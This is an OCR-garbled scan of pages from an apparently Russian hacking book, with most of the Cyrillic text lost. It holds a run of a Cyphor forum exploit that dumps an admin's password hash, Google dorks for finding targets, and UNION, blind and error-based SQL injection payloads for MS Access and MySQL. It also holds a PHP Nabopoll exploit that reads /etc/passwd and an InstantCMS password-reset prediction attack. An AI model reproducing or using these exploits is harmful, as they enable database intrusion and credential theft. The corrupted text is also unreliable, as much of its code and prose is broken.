peri cyphor019.pl http://localhost/webexploitation_package_02/cyphor/ 1
, ,
( 1).
. 4.1.

bt tmp peri cyphor619.pl http:'//localhost/webexploitationjackage_02/cyphor/


# Cyphor Foruffl Exploit By : HACKERS PAL
# Http:./
.SoQoR sHeT I
# Greets To Devil-60 - Abducter # alnast-ar #
U]
[+]
t+1
1+]

Connected to: http://localh0st/wd3iexploitationj5ackage_02/cyphor/


User 10 is : 1
User Jfaw is: adniri
Hash of password is: ad4ERft.YJ7j9A

Greets Fro HACKERS>J|L To you :)


WwW, SoQoR. HeT . . 1 You Are 1

! *

. 4 .1 . SQL- Cyphor


SQ L-
.

ns

SQL-
MS SQL Jet

,
.
1. Google:
s it e :.o r g i n u r l : .asp?id=*
site:.com i n u r l : .aspx?*
s i t e : . co.uk i n u r l : .asp?cid~

- .
2. , h t t p : //www. si t e .com
:
h ttp : / /www.site.com/en/press read. asp? i d=563
. URL
, :
h ttp : / /www.site.com/en/press read. asp? i d=563'
:
Microsoft OLE DB Provider fo r ODBC Drivers e rro r '80040el4'
[Microsoft][ODBC Microsoft Access D riv e r] Syntax e rro r in
s trin g in query expression 'id=563'
/en/includes/configdb.asp. lin e 23

,
, AND+1=1:
http://www.si te .com/en/pressread.asp?i d=563+AND+l=l#
------------------------------------------------------------------------------------------------------- -------------------- ASP # ,
- - /*.

type mismatch Cint


, .
, ,
, . AND+1=0#:
http://www. s i t e .com/en/pressread.asp?i d-563+AND*1=0#

SQL- MS SQL lot

153

:
A000B.Field error *800a0bcd*
Either BOF or EOF is True, or the current record has been deleted*
Requested operation requires a current, record.
/en/pressread.asp. line 44

To ,
ORDER BY . , , 10.
, :
Microsoft OLE DB Provider for ODBC Drivers error 80004005'
[Microsoft][ODBC Microsoft Access Driver] 1he Microsoft Jet database
engine does not recognize 10* as a valid field name or expression,
/en/includes/configdb.asp. line 23
, 10 .
, .
7:
http: //www. si te.com/en/pressread. asp?id*563+AND+1-04IN10N* At t.+Sl.l EC1
1 .2 .3 .4 .5 .6 .7 #
:
Microsoft OLE DB Provider for ODBC Drivers error 80004005'
[Microsoft][ODBC Microsoft Access Driver] Query input must, contain
at least one table or query.
/en/includes/configdb.asp. line 23
,
. :
http: / /www.site.com//press read.asp? id-563+AND+1-0+UNION+Al I+SGLt CT
1 .2 .3 .4 .5 .6 .7 FROM user#
,
:
Microsoft OLE DB Provider for ODBC Drivers error 80040e37
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database
engine cannot find the input table or query 'user'. Make sure It,
exists and that Its name 1s spelled correctly.
/en/includes/configdb.asp, line 23
, , ,
: user, users, admin, login, news, sysobjects, customers. ,
admin. ,
,
, , :
http://www.site./en/pressread.asp?1d-563+AND+l0+UNION+Al l +SI11GT*
l.2.3.4.5,6.7+from+adm1n#

154

5. SQL- MS SQL Jet

3. , GROUP
BY ... HAVING, :

HAVING 1-1 -GROUP BY -.-----1 HAVING 1-1 -GROUP BY -.-----1,


-.-----2 HAVING 1-1 -GROUP BY -.-----1.
-.-----2,
----- (n) HAVING 1-1 -- . .



nabopoll.php

06,
, .
, .
, . :
<?
# Nabopoll Blind SQL Injection Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by sOcratex
# Contact: sOcratex@hotmail.com
# July 1. 2010 - modified by Uri
error_reporting(0);
ini_set("max_execution_time".0);
$srv - "localhost"; $path = ,7webexploitation_package_02/nabopoll";
$port = 80:
:
Ssurvey = "1"; //you can verify the number entering in the site
and viewing the re su lts ...
echo
\n ";
. .., 4
echo "Nabopoll SQL Injection -- Modified Exploit\n";
echo "......................................................................................-\n\n";
echo " -- /etc/passwd: \n:
$j - 1; $user - "";$x-0;
while(!strstr($user.chr(0))){
Sminx 0: Smaxx = 255;
$found = false; Sop - ">";
whi 1e( !$found) {
$x - intval(($maxx + Sminx)/2);
if (Smaxx == $minx+l) {
if (Sop == ">") { Sx-Smaxx; $found=true;$user.=chr($x);echo chr(Sx):break:}
if ((Sop
and (Sbingo)) { Sx=Smaxx; Sfoundtrue;$user.=chr(Sx);
echo chr(Sx);break;}
Sbingo = false;
Sxpl - 7result.php?surv-".Ssurvey."/**/AND/**/l-(
SELECT/**/( IF((ASCII(SUBSTRING(1oad_fi1e(
0x2f6574632f706173737764)S j.", 1 ))".Sop.Sx.").1.0)))/*";
Scnx - fsockopen(Ssrv,Sport);

ft

mu

15

__

. nabopoll.php

fwrite($cnx."GET ".S path.S xplH T T P /1.0\r\n\r\n");


whi 1e ( !feof($cnx)){ 1f(ereg(power", fgets($cnx))){

Sbingo-true;break; } }
fclose(Scnx):
i f (Sx255) {die(H\n Try again../);}
Sprevop-Sop;
1f (Sbingo) {
switch(Sop)
{

case
Sminx Sx;
break;
case
Smaxx - Sx;
break;
}

else
switch(Sop)
{

I : I

case
break;
case

w uvm

m &

'*

break:
}

Sj++;
}

echo "\n";
?>

, , -
( , , Sxpl-),
.



SQL- MS Access

:
[...] AND (SELECT TOP 1 1 FROM _)

:
[...] AND (SELECT TOP 1 1 FROM users)

:
AND (SELECT TOP 1 _ FROM _)

:
[...] AND (SELECT TOP 1 name FROM users)

:
[...] AND IIF((SELECT TOP 1 LEN(_) FROM _ = X. 1. 0)

:
[...] AND IIF((SELECT TOP 1 LEN(name) FROM users) - 8, 1. 0)

:
[...] AND IIF((SELECT TOP 1 _. X. 1)
FROM _) = ('), 1, 0)

:
[...] AND IIF((SELECT TOP 1 MID(name. 1. 1)
FROM users ) = CHR(65). 1. 0)


instantCMS
T he m atrix,
,
.

h ttp s://forum.antichat.ru/showpost.php?p-2138088&postcount-23
, ,
http://ifolder.ru/17669676
http://webfile.ru/4490132

.
( )
.
? /com ponents/registration/frontend.php :
$sql "SELECT * FROM cms_users WHERE email - 'SemaiT LIMIT 1";
Sresult = $inDB->query($sql) ;
i f ($inDB->num_rows(Sresult)>0){
$usr = $inDB->fetch_assoc($result):
Snewpassword = substr(md5(microtimeO), 0, 6);
$inDB->query("UPDATE cms_users SET password '" .md5($newpassword)."' WHERE id - ".$usr[1d']) ;
$mail_message I $_LANG[ ' HELLO' ] . ' , ' . $usr['nickname'] . ! '. "\n\n";
$mail_message = $_LANG['HELLO' ] . ' , ' . $usr['nickname'] . ' ! ' . "\n\n";
$mail_message .= $_LANG[
'REMINDERJEXT'].'
,$inC onf-> sitenam e. . "\n\n":
$mail_message
$_LANG[*0UR_PASS_IS_MD5'3 . "\n";
$mail_message
$_LAN6['0UR_PASS_IS_MD5_TEXT'] . "\n\n";
$mail_message .= ' ########## ' .$_LANG['Y0UR_L0GIN'].': ' ,$usr[
'lo g in '].
''
$mail_message
1 '. $_LANG[
' Y0UR_NEW_PASS' ] . : ' .$newpassword . "\n\n":

instantCMS

159

$mail_message .- $_LANG['YOU_CAN_CHANGE_PASS']."\n";
Smail_message

$_LANG['IN_CONFIG_PROFILE'].':

cmsUser::

getProfileURL(Susr['login']) . "\n\n;
$mail_message
$_LANG[
'SIGNATURE'].. '. $inConf->sitename . ' ('.HOST.').' . "\n";
$mail_message .- date('d-m-Y (H:i)');
$inCore->mailText(Sernail, SinConf->sitename.' -

.$_LANG[

*REMINDER_PASS]. $mail_message);

.
?
1. , .
2. , ,
, microti me().
microti me .
,
gett i meofday ().
msec sec, sec ,
Unix (The Unix Epoch, 1 1970, 00:00:00 GMT),
a msec . - :
. [1273589840]

,
, Unix.
?
, .
- :
. 11 May 2010 20:39:23 GMT

, 1970, 00:00:00
GMT.
Vv i
, .
OjacaxcOO ( , Unix
). :
0.30001200 1273589840


( ).
substr(md5(3Wd4eHne), 0, 6)

md5-xeni
, :
1512

160

8.

1 . .
| -.
. ,
11 : 1000000/11 90.909
. , ,
.
,
100-,
. ,
.


SQL-

() ,
SQL-.
, ,
(, md5 ). ,
, .
, ,
,
/etc/passwd. , . ,
( )
, ,
.
, ,
.
, ,
, , .
/etc/passwd
. , ,
(, ,
/etc/passwd ,
, ).
, ,
SQL-,
.


find_in_set(substr, strlist)
MySQL find_in_set(),
, .
, . ,

162

9. SQL-

0.
MySQL ( ' ' 'a.b.c.d.e'):
mysql> SELECT FIND_IN_SET(''.'a.b.c.d.e');
-> 3

15- :
,2,3.4.5.6,7.8,9.a.b.c.d.e,
:
select find_in_set((substring((select password from users
limit D.l.l)).'0.1.2.3.4.5.6.7.8.9.a.b.c.d,e.f');

, ' 11. ,
1 16,
:
news.php?i d=fi nd_i n set (substri ng( (sel ect password from users
limit 0.1).l.l).'0.1.2.3.4.5.6.7.8.9.a.b.c.d.e.f')

,
.

.
1.
( , ).
2. find_in_set()
.
3. ,
, .
: 32+16 15-.
find_in_set() : INSTRO,
LOCATE(), ASCI I(), 0RD(), ASCI I() ORDO ,
MySQL.

.
:
;
,
.
:
,
;

,
, .

find_jn_set() + morelrow

163


find_in_set() + m orelrow
,

(, ).
Elekt.
, SQL-.
( podkashey)
SELECT 1 UNION SELECT 2

Subquery returns more than 1 row
ZaCo :
"" regexp concat("{1,25". if(@@version<>5 , }, 6}"))

/*

else

*/

MySql, 5,
#1139 I Got error 'invalid repetition count(s)' from regexp.
9 ,
regexp, 11
, .
SELECT 1 .
:
select i f (1-1.(select 1 union select 2).2)
^
#1242 - Subquery returns more than 1 row
select 1 regexp if(l=l,"x{l,0}".2)
#1139 - Got error invalid repetition count(s) from regexp
select 1 regexp if(l-l," x { l.(" .2 )
#1139 - Got error ' braces not balanced from regexp
select 1 regexp i f (1=1,[ [ : ] ] .2)
#1139 - Got error 'invalid character class from regexp
select 1 regexp i f ( 1 = 1 , , 2 )
#1139 - Got error brackets ([ ]) not balanced from regexp
select 1 regexp i f (1-1,(({1} .2)
#1139 - Got error 'repetition-operator operand invalid' from regexp
select 1 regexp i f ( l - l , " , 2 )
#1139 - Got error 'empty (subExpression from regexp
select 1 regexp i f (1-1,( ,2)
#1139 - Got error 'parentheses not balanced from regexp
select 1 regexp i f (1-1.[2-1] ,2)
#1139 - Got error invalid character range from regexp
select 1 regexp i f (1-1,[[.c h .] ] .2)
#1139 - Got error invalid collating element from regexp
select 1 regexp i f (1-1, '\V ,2)
#1139 - Got error 'tra ilin g backslash (\) from regexp

164

9. SQL-

f1nd_in_set().
, , , 0.
:
select * from users where ich-1 AND "x" regexp concat(
"x{l,25". if(find_in_set(substring((select passwd from users
where id = l).l.l).Ta Ib .c .d ,e .f.l.2 .3 .4 .5 .6 , )>0. (
select 1 union select 2). 6}"))
'...d..f . 1,2.3 . 4 . 5 . 6',
:
#1242 - Subquery returns more than 1 row

#1139 - Got error 'invalid repetition count(s)' from regexp
To ,
. ,
.
15- ,
[0-9, -f]. ,
12 (11 , ). , :
[1] '0'
[2] *1'
[3] '2'
[4] '3'
[5] '4'
[6] '5'
[7] '6'
[8] '7'
[9] '8'
[10]: '9
]:
, ,
, .
2- 11-,
. 1,
-
:
[1] '0
[2] *
[3] '
[4] 'd
[5] '
[6] f
SQL .

flndjn_set() + morelrow

165

1. .
2. ,
.
3. , ,
, ,
1.
, , ,
[a-z, A-Z, 0-9] 11
.
,
,
,
.
, 42 md5-x3m.
:
;
.
, ,
.

.
,
. 11 ,
,
. I!
, (,
, ).
-day
.
0-

. -.

jtr . .
(abend, aborption end) ,
(abort) () ,
^ (abuse)

,
,
.
(admin) ,

. .

(account) , ,
. .
(, ) ICQ (--), .
, (black hat) , ,
^

167

him | 1 Mitiiui f I *'#' *I ) ( BSD, Net BSD OpenBSD).

<V

n n i l n h i <!i nsii ( whitli 1!)


, in- ,
v ijmunii. vi 1 im, HiH>Kf; /.

|'(\1|(! Windows.

. (vilt*)

llydl'tt,

'l'IUw4

hht, Wh hat.)

, .

' & vomi


11 i limit'd @{1 of Service, DDpS)
It Of*t IV4villtaHllll
( u i (ItHllrtttnl)

John The Kipper,

,
, , .

( I ) ! Service, I >*S)

' |(11

Miiiiih Juvtt (

;.1JavaScript.

h;i D oS-.

* ( )

;>,

(inject)

, . .

(include)

(inclutliiiK)
. (include)

<, ,
,

(inject ion)
* ,
) , * ,
(I )
||||<

, .
.

() (keyboard)
' (1)
'

168

10.

(code) , -

.
(coding) .
.
(core) .
netcat.
(crack) , -
.
(cool hacker) (
).
(lamer) , ;
, .
(.) Linux.
(log) (
).
(log-wiper) , (. ).
(login) .
.
( must die) - , ; MS Windows.
(malware) .
. .
(manual) ( -,
).
(must have) - ,
.
, ,
(mIRC) ,
.
MySQL.
(mail) , e-mail.
.
.
netcat ().
(nick, nickname) .
Unix- .

;>; ^


( null)

, , 6; * ,

- (mdl-byle, by to)
(nuke)

, .
. .

169

(<)S)

( public nplo.it) , ,
I , -day sploit.
(pass, password)
,

Python Python.

( )S/2 (|> I (
).
( to root)
,
( use)
( use)

, .

, -.

P IIP .

(root)

*nix .

root.

SunOS.

, (secure)

. .

<', .

(script kiddie)
-,
, , ,.
.

. .

SQL.

170

10.

, (sniffer)
cookie).

, - (,

, - Solaris,
(soft) , ,
,
.
, (sploit) .
.
. .
ICQ (. ).
(tips) , .
(tricks) ( ).
. .
.
., . .
Linux ( ),
(user identification number, UIN) ICQ.
, .
(Frequently Asked Questions, FAQ)
.
(phishing)
.
, (flood) ,
FreeBSD,
. .
(hack) .
& (hacking) ,
-.
.
. .
(host) , , ,
,
,
. .

171

- (Internet worm), .
(shell) .
IC O ,
.
(exploit) ,
.
( use) , . , . .
. .
(user) .
. .